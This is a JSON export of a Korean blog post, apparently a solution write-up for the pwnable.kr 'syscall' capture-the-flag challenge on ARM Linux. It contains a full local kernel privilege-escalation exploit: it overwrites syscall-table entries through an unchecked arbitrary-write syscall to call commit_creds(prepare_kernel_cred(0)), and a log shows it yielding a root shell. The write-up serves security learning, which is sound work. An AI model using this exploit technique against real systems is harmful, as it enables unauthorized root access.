{"id":2535,"date":"2024-05-23T02:08:44","date_gmt":"2024-05-22T17:08:44","guid":{"rendered":"https:\/\/h4ck.kr\/?p=2535"},"modified":"2025-04-10T19:17:27","modified_gmt":"2025-04-10T10:17:27","slug":"syscall","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=2535","title":{"rendered":"syscall"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Description<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">I made a new system call for Linux kernel.<br>It converts lowercase letters to upper case letters.<br>would you like to see the implementation?<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Download : http:\/\/pwnable.kr\/bin\/syscall.c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">ssh syscall@pwnable.kr -p2222 (pw:guest)<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Analysis<\/h2>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/\/ adding a new system call : sys_upper\n\n#include &lt;linux\/module.h>\n#include &lt;linux\/kernel.h>\n#include &lt;linux\/slab.h>\n#include &lt;linux\/vmalloc.h>\n#include &lt;linux\/mm.h>\n#include &lt;asm\/unistd.h>\n#include &lt;asm\/page.h>\n#include &lt;linux\/syscalls.h>\n\n#define SYS_CALL_TABLE\t\t0x8000e348\t\t\/\/ manually configure this address!!\n#define NR_SYS_UNUSED\t\t223\n\n\/\/Pointers to re-mapped writable pages\nunsigned int** sct;\n\nasmlinkage long sys_upper(char *in, char* out){\n\tint len = strlen(in);\n\tint i;\n\tfor(i=0; i&lt;len; i++){\n\t\tif(in[i]>=0x61 &amp;&amp; in[i]&lt;=0x7a){\n\t\t\tout[i] = in[i] - 0x20;\n\t\t}\n\t\telse{\n\t\t\tout[i] = in[i];\n\t\t}\n\t}\n\treturn 0;\n}\n\nstatic int __init initmodule(void ){\n\tsct = (unsigned int**)SYS_CALL_TABLE;\n\tsct[NR_SYS_UNUSED] = sys_upper;\n\tprintk(\"sys_upper(number : 223) is added\\n\");\n\treturn 0;\n}\n\nstatic void __exit exitmodule(void ){\n\treturn;\n}\n\nmodule_init( initmodule );\nmodule_exit( exitmodule );\n<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">sys_upper<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\uc785\ub825\ubc1b\uc740 in \ubb38\uc790\uc5f4 \uc911 \ud558\ub098\uc758 \ubb38\uc790\uac00 \uc18c\ubb38\uc790\uc77c \uacbd\uc6b0, <br>\ub300\ubb38\uc790\ub85c \ubcc0\ud658\ud560 \uc218 \uc788\ub3c4\ub85d \uc544\uc2a4\ud0a4 \ucf54\ub4dc\uac12\uc5d0\uc11c 0x20\ub97c \ube7c\uace0 \uc788\ub2e4.<br>\uadf8\ub807\uac8c \ub300\ubb38\uc790\ub85c \ubaa8\ub450 \ubcc0\ud658\ud55c \ubb38\uc790\uc5f4\uc744 out \ubb38\uc790\uc5f4\ub85c \uc9c0\uc815\ud55c\ub2e4.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">initmodule<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">initmodule \ud568\uc218\ub294 \ub9ac\ub205\uc2a4 \ucee4\ub110 \ubaa8\ub4c8\uc774 \uc62c\ub77c\uac08\ub54c \ucd08\uae30\ud654\ub418\ub294 \uacfc\uc815\uc5d0\uc11c \ud638\ucd9c\ub41c\ub2e4.<br>\uc2dc\uc2a4\ud15c \ucf5c 223\ubc88\uc5d0\uc11c sys_upper \ud568\uc218\ub97c \ud638\ucd9c\ud560 \uc218 \uc788\ub3c4\ub85d \ucd94\uac00\ud55c\ub2e4.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\ud658\uacbd\uc740 ARMv7l (32\ube44\ud2b8) \ud658\uacbd\uc774\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"710\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uc2a4\ud06c\ub9b0\uc0f7-2024-05-23-\uc624\uc804-1.04.45-1024x710.png\" alt=\"\" class=\"wp-image-2536\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uc2a4\ud06c\ub9b0\uc0f7-2024-05-23-\uc624\uc804-1.04.45-1024x710.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uc2a4\ud06c\ub9b0\uc0f7-2024-05-23-\uc624\uc804-1.04.45-300x208.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uc2a4\ud06c\ub9b0\uc0f7-2024-05-23-\uc624\uc804-1.04.45-768x532.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uc2a4\ud06c\ub9b0\uc0f7-2024-05-23-\uc624\uc804-1.04.45.png 1394w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\uc2e4\uc81c\ub85c ssh \uc811\uadfc\ud574\uc11c \ud655\uc778\ud574\ubcf4\uba74, \uc2dc\uc2a4\ud15c \ucf5c 223\ubc88\uc774 \ucd94\uac00\ub418\uc5c8\ub2e4\uace0 dmesg \ub85c\uadf8\uc5d0 \ub098\ud0c0\ub09c\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sys_upper \ud568\uc218\ub97c \uc790\uc138\ud788 \uc0b4\ud3b4\ubcf4\uba74, <br>\ubcc0\ud658\uc2dc\ud0a8 \ub300\ubb38\uc790 \ubb38\uc790\uc5f4\uc744 \ub9ac\ud134\ud558\ub294 \uac83\uc774 \uc544\ub2c8\uace0 <br>\ucee4\ub110 \uc601\uc5ed\uc5d0 \uc6d0\ud558\ub294 \uc8fc\uc18c\uc5d0\ub2e4\uac00 \uac12\uc744 \uc4f8 \uc218 \uc788\ub2e4!<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ucee4\ub110 \ucde8\uc57d\uc810\uc744 \ud1b5\ud574 root \uad8c\ud55c\uc744 \ud68d\ub4dd\ud558\ub824\uba74 <code>commit_creds(prepare_kernel_cred(0));<\/code> \ud638\ucd9c\ud558\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uc6b0\uc120\uc740 <code>commit_creds<\/code>\uc640 <code>prepare_kernel_cred<\/code> \ud568\uc218 \uc2ec\ubcfc\uc744 \ucc3e\uc544\ubcf4\uba74,<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/ $ cat \/proc\/kallsyms | grep commit_creds\n8003f56c T commit_creds\n8044548c r __ksymtab_commit_creds\n8044ffc8 r __kstrtab_commit_creds\n\/ $ cat \/proc\/kallsyms | grep prepare_kernel_cred\n8003f924 T prepare_kernel_cred\n80447f34 r __ksymtab_prepare_kernel_cred\n8044ff8c r __kstrtab_prepare_kernel_cred<\/pre>\n<\/div><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><code>commit_creds<\/code> = 0x8003f56c, <br><code>prepare_kernel_cred<\/code> = 0x8003f924 \uc8fc\uc18c\uc774\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uc2dc\uc2a4\ud15c \ucf5c \ud14c\uc774\ube14\uc744 \uc54c\uace0 \uc788\uae30 \ub54c\ubb38\uc5d0 \uc774\uc81c \uc774 \ud568\uc218\ub4e4\uc744 \ud638\ucd9c\ud558\uae30 \uc704\ud574 \ub36e\uc5b4\uc4f8 \uac83\uc774\ub2e4.<br>\ub9e4\uac1c\ubcc0\uc218\uac00 \ud558\ub098\uc778 \uc2dc\uc2a4\ud15c\ucf5c \ud568\uc218\ub97c \ucc3e\uc544 setfsuid, setfsgid\ub97c \ub300\uc0c1\uc73c\ub85c \uac01\uac01 commit_creds, prepare_kernel_cred \ud568\uc218\ub85c \ub36e\uc5b4\uc368\ubcf4\uc790.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uc2dc\uc2a4\ud15c\ucf5c \ubc88\ud638\ub294 \/usr\/include\/arm-linux-gnueabihf\/asm\/unistd.h \ud30c\uc77c\uc5d0\uc11c \ud655\uc778\ud560 \uc218 \uc788\uc5c8\ub2e4.<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/ $ cat \/usr\/include\/arm-linux-gnueabihf\/asm\/unistd.h\n...\n#define __NR_setfsuid\t\t\t(__NR_SYSCALL_BASE+138)\n#define __NR_setfsgid\t\t\t(__NR_SYSCALL_BASE+139)\n...<\/pre>\n<\/div><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">setfsuid\ub294 138\ubc88, setfsgid\ub294 139\ubc88\uc774\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uc774\uc81c \uc544\ub798\uc640 \uac19\uc774 \ub36e\uc5b4\uc4f0\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">syscall(223, \"\\x24\\xf9\\x03\\x80\", &amp;sct[138]);\nsyscall(223, \"\\x6c\\xf5\\x03\\x80\", &amp;sct[139]);<\/pre>\n<\/div><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\uc5ec\uae30\uc11c \\x6c\uac00 \uc18c\ubb38\uc790 \ubc94\uc704\uc778 <code>in[i]&gt;=0x61 &amp;&amp; in[i]&lt;=0x7a<\/code>\uc5d0 \uc18d\ud558\ubbc0\ub85c, <br>\uc2e4\uc81c setfsgid \ud568\uc218\ub97c \ud638\ucd9c\ud560\ub54c, \ucee4\ub110\uc5d0\uc11c 0x8003f56c\uc5d0\uc11c 0x20\uc744 \ube80, 0x8003f54c \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0a4\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ub530\ub77c\uc11c 0x8003f54c \uc8fc\uc18c\uc5d0\uc11c 0x20\ub9cc\ud07c mov r3, r3 \ub354\ubbf8 \uba85\ub839\uc5b4\ub97c 0x20 \ud06c\uae30\ub9cc\ud07c \ub123\uc5b4\uc8fc\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"437\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uc2a4\ud06c\ub9b0\uc0f7-2024-05-23-\uc624\uc804-2.10.23-1024x437.png\" alt=\"\" class=\"wp-image-2539\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uc2a4\ud06c\ub9b0\uc0f7-2024-05-23-\uc624\uc804-2.10.23-1024x437.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uc2a4\ud06c\ub9b0\uc0f7-2024-05-23-\uc624\uc804-2.10.23-300x128.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uc2a4\ud06c\ub9b0\uc0f7-2024-05-23-\uc624\uc804-2.10.23-768x328.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uc2a4\ud06c\ub9b0\uc0f7-2024-05-23-\uc624\uc804-2.10.23-1536x655.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uc2a4\ud06c\ub9b0\uc0f7-2024-05-23-\uc624\uc804-2.10.23-2048x874.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">syscall(223, \"\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\", 0x8003f54c);<\/pre>\n<\/div><\/div>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;unistd.h>\n#include &lt;sys\/syscall.h>\n#define \tSYS_CALL_TABLE\t0x8000e348\n\nunsigned int **sct;\n\nint main(){\n\tsct = (unsigned int**)SYS_CALL_TABLE;\n\n\t\/\/mov r3, r3... 32bytes\n\tsyscall(223, \"\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\\xe1\\xa0\\x30\\x03\", 0x8003f54c);\n\t\/\/0x8003f924 = prepare_kernel_cred\n\tsyscall(223, \"\\x24\\xf9\\x03\\x80\", &amp;sct[138]);\n\t\/\/0x8003f56c = commit_creds\n\tsyscall(223, \"\\x6c\\xf5\\x03\\x80\", &amp;sct[139]);\n\n\tsyscall(139, syscall(138, 0));\n\tsystem(\"\/bin\/sh\");\n\n\treturn 0;\n\n}<\/pre>\n<\/div><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Result<\/h2>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">...\nsys_upper(number : 223) is added\ncttyhack: can't open '\/dev\/ttyS0': No such file or directory\nsh: can't access tty; job control turned off\n\/ $ cd \/tmp\n\/tmp $ vi exp.c\n\/tmp $ gcc -o exp exp.c\n\/tmp $ .\/exp\n\/bin\/sh: can't access tty; job control turned off\n\/tmp # id\nuid=0 gid=0\n\/tmp # cat \/root\/flag\nCongratz!! addr_limit looks quite IMPORTANT now... huh?\n\/tmp # qemu-system-arm: terminating on signal 2\nConnection to pwnable.kr closed<\/pre>\n<\/div><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>New Flag<br><\/strong>Must_san1tize_Us3r_p0int3r<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Description I made a new system call for Linux kernel.It converts lowercase letters to upper case letters.would you like to see the implementation? Download : http:\/\/pwnable.kr\/bin\/syscall.c ssh syscall@pwnable.kr -p2222 (pw:guest) Analysis sys_upper \uc785\ub825\ubc1b\uc740 in \ubb38\uc790\uc5f4 \uc911 \ud558\ub098\uc758 \ubb38\uc790\uac00 \uc18c\ubb38\uc790\uc77c \uacbd\uc6b0, \ub300\ubb38\uc790\ub85c \ubcc0\ud658\ud560 \uc218 \uc788\ub3c4\ub85d \uc544\uc2a4\ud0a4 \ucf54\ub4dc\uac12\uc5d0\uc11c 0x20\ub97c \ube7c\uace0 \uc788\ub2e4.\uadf8\ub807\uac8c \ub300\ubb38\uc790\ub85c \ubaa8\ub450 \ubcc0\ud658\ud55c \ubb38\uc790\uc5f4\uc744 out \ubb38\uc790\uc5f4\ub85c&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=2535\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">syscall<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[4],"tags":[41,44,25],"class_list":["post-2535","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-arm","tag-linux-kernel","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2535","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2535"}],"version-history":[{"count":4,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2535\/revisions"}],"predecessor-version":[{"id":3284,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2535\/revisions\/3284"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2535"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2535"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2535"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}